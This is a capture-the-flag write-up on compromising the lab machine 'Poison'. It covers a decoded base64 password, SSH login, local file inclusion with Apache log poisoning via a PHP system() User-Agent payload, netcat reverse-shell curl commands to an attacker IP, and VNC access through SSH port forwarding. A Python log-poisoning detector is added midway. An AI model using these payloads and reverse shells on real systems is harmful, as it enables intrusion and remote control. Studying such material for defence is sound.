Recon
nmap x rustscan
└─$ rustscan -a 10.10.10.84 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFLpOCLU3rRUdNNbb5u5WlP+JKUpoYw4znHe0n4mRlv5sQ5kkkZSDNMqXtfWUFzevPaLaJboNBOAXjPwd1OV1wL2YFcGsTL5MOXgTeW4ixpxNBsnBj67mPSmQSaWcudPUmhqnT5VhKYLbPk43FsWqGkNhDtbuBVo9/BmN+GjN1v7w54PPtn8wDd7Zap3yStvwRxeq8E0nBE4odsfBhPPC01302RZzkiXymV73WqmI8MeF9W94giTBQS5swH6NgUe4/QV1tOjTct/uzidFx+8bbcwcQ1eUgK5DyRLaEhou7PRlZX6Pg5YgcuQUlYbGjgk6ycMJDuwb2D5mJkAzN4dih
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXh613KF4mJTcOxbIy/3mN/O/wAYht2Vt4m9PUoQBBSao16RI9B3VYod1HSbx3PYsPpKmqjcT7A/fHggPIzDYU=
| 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJrg2EBbG5D2maVLhDME5mZwrvlhTXrK7jiEI+MiZ+Am
80/tcp open http syn-ack Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
We are facing a FreeBSD machine :/ We have two open ports: ssh & http.
Browsing to http://10.10.10.84/ we land on a “temporary website” where we can test some PHP scripts.
The website lists some pages:
- ini.php
- info.php: leaks the machine name and the version, FreeBSD 11.1-RELEASE
- listfiles.php: leaks a file, pwdbackup.txt
- phpinfo.php: leaks PHP information (PHP v5.6.32)
The pwdbackup.txt file exposes a “secure” password that seems to be base64-encoded 13 times, according to the sentence in it.
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Passing the password through a base64 decoder 13 times, we get the password Charix!2#4%6&8(0.
I first try to connect to the box over ssh using the credentials charix:Charix!2#4%6&8(0, guessing that the first word of the password is the username, and…
Welcome to FreeBSD!
charix@Poison:~ % cat /home/charix/user.txt
**************************04209c
We got our first shell! And the user flag :)
Path to the privesc
Local recon
In charix's home directory we found a zip archive named secret.zip. Decompressing it failed because the archive is password protected.
So I tried some brute-forcing with john.
# get hash from zip2john
└─$ zip2john secret.zip > hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
But it failed.
Then, I ran a scan with LinEnum to look for interesting things, but I couldn't find any useful information (crontab, running processes, etc.).
Thinking about logs
The box is named Poison, which made me think of a well-known technique called log poisoning. Log poisoning consists of injecting malicious code into log files.
I searched the log directory and found a log named httpd-access.log. It logs every request made to the web server.
Indeed, we can find there our requests to http://10.10.10.84/browse.php:
charix@Poison:/var/log % tail httpd-access.log
10.10.16.7 - - [30/Aug/2022:00:09:42 +0200] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:44 +0200] "GET /browse.php?file=info.php HTTP/1.1" 200 157 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:46 +0200] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:10:11 +0200] "GET /browse.php?file=COUCOU HTTP/1.1" 200 357 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
Now that we know that everything is logged, we can try some log poisoning.
Thanks to this article, I learned how logs can be manipulated to execute commands.
To do so, we need access to the log file through an LFI. I check whether an LFI is possible by retrieving a file through the form: http://10.10.10.84/browse.php?file=..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log
We are able to get the httpd-access.log file through the LFI.
Exploiting logs
With Burp, we intercept the web request to the log file (on http://10.10.10.84/browse.php?file=../../../../../var/log/httpd-access.log) and replace the User-Agent field with the payload below.
<?php system($_GET['cmd']); ?>
Then we send the request. Our payload is now in the log file. We can check that it works by sending commands through it.
# sending a 'ls -al' command
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al"
10.10.16.7 - - [30/Aug/2022:01:08:51 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 879 "-" "total 72
drwxr-xr-x 2 root wheel 512 Mar 19 2018 .
drwxr-xr-x 6 root wheel 512 Jan 24 2018 ..
-rw-r--r-- 1 root wheel 33 Jan 24 2018 browse.php
-rw-r--r-- 1 root wheel 289 Jan 24 2018 index.php
-rw-r--r-- 1 root wheel 27 Jan 24 2018 info.php
-rw-r--r-- 1 root wheel 33 Jan 24 2018 ini.php
-rw-r--r-- 1 root wheel 90 Jan 24 2018 listfiles.php
-rw-r--r-- 1 root wheel 20 Jan 24 2018 phpinfo.php
-rw-r--r-- 1 root wheel 1267 Mar 19 2018 pwdbackup.txt
"
10.10.16.7 - - [30/Aug/2022:01:09:05 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al HTTP/1.1" 200 1499 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
It works! Let’s try to get a reverse shell. The LinEnum scan found that the netcat command is available.
# Listen on Host
└─$ rlwrap nc -lvnp 4444
# try to get reverse shell using 'nc' then '/dev/tcp'
# /usr/bin/nc 10.10.16.7 4444 -e sh
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=/usr/bin/nc%2010.10.16.7%204444%20-e%20sh"
Sadly, it does not work. The PentestMonkey cheat sheet provides a second method that can give a reverse shell when the basic one does not work.
# alternative netcat reverse shell
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f
└─$ curl "http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.16.7%204444%20%3E/tmp/f"
And we got another shell, as the www user.
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.84] 17534
sh: can't access tty; job control turned off
whoami
www
At this point, I can’t find anything useful with that user. But it was cool to apply this technique.
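As an added example for the defender's side of the technique above (not part of the original write-up), here is a small detection script: it parses Apache combined-format access-log lines and flags a PHP open tag stored in the User-Agent field, a file= parameter that escapes the web root or points at a log file, a cmd= parameter, and entries broken by multi-line payload output. The sample lines are constructed after the ones shown in this write-up.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)   # PHP open tag written into the log
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")                 # ../ or ..\ in the included file name

def analyse_line(line):
    """Return the list of indicator names raised by one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        # Payload output containing newlines splits one entry over several lines: flag it.
        return ["malformed_entry"]
    findings = []
    if PHP_TAG_RE.search(m.group("ua")):
        findings.append("php_tag_in_user_agent")
    fields = m.group("request").split(" ")
    if len(fields) != 3:
        return findings + ["malformed_request"]
    params = parse_qs(urlsplit(fields[1]).query, keep_blank_values=True)
    for value in params.get("file", []):          # parse_qs URL-decodes %2F etc. for us
        if value.startswith("/") or TRAVERSAL_RE.search(value):
            findings.append("file_param_path_escape")
        if "/var/log/" in value or value.endswith(".log"):
            findings.append("file_param_log_file")
    if "cmd" in params:
        findings.append("cmd_param")
    return findings

def scan_log(lines):
    """Return (1-based line number, findings) for every line that raised an indicator."""
    report = []
    for number, line in enumerate(lines, start=1):
        findings = analyse_line(line.rstrip("\n"))
        if findings:
            report.append((number, findings))
    return report

# Constructed sample entries, modelled on the lines shown in this write-up.
SAMPLE_LOG = [
    '10.10.16.7 - - [30/Aug/2022:00:09:42 +0200] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"',
    '10.10.16.7 - - [30/Aug/2022:01:05:10 +0200] "GET /browse.php?file=..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 879 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.10.16.7 - - [30/Aug/2022:01:09:05 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al HTTP/1.1" 200 1499 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"',
    "drwxr-xr-x 2 root wheel 512 Mar 19 2018 .",   # payload output that spilled into the log
]
```

Running scan_log(SAMPLE_LOG) reports lines 2, 3 and 4; the first line (a normal request for ini.php) raises nothing.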
Go back in time
I decided to go back and spend more time on the secret.zip archive found earlier. So I check if there are any active network connections.
I try netstat -lnptu, but some options are not present on FreeBSD. A quick search gives the FreeBSD equivalent.
# show listening connection
sockstat -l
charix@Poison:~ % sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root sendmail 653 3 tcp4 127.0.0.1:25 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
We found two potentially interesting listening services: sendmail & Xvnc. I first search for Xvnc vulnerabilities using searchsploit.
# checking version
charix@Poison:/tmp % Xvnc -version
Xvnc version TightVNC-1.3.10
└─$ searchsploit TightVNC
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
TightVNC - Authentication Failure Integer Overflow (PoC) | windows/dos/8024.py
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows | windows/dos/7990.py
----------------------------------------------------------------------- ---------------------------------
We found an Integer Overflow! Let’s try the exploit!
Exploit Xvnc service
Unfortunately I was not able to exploit this vulnerability. Instead, I managed to get local access to the VNC service.
To do so, as the VNC server only listens locally on the box, we can use ssh to forward the port to our machine with the -L option.
# From HOST
└─$ ssh -L 5901:localhost:5901 charix@10.10.10.84
# From HOST
└─$ vncviewer localhost:5901
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password: Charix!2#4%6&8(0
Authentication failed
We now have access to VNC. I try the password we have, but we get an “Authentication failed”.
And then… 🤦♂️🤦♂️🤦♂️
Could the password of the archive be the one of the user charix?
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
extracting: secret
Looking at the vncviewer options, I found that a file can be used to authenticate.
└─$ vncviewer localhost:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
We get a root shell and can grab the flag :)
Log Poisoning, FreeBSD, Easy, External, Apache, Penetration Tester Level 1, Local File Inclusion, A08:2021-Software And Data Integrity Failures, Use Of Injection Attacks, VNC, Confidentiality, Weak Authentication, Network, Password Reuse, Tunneling, Port Forwarding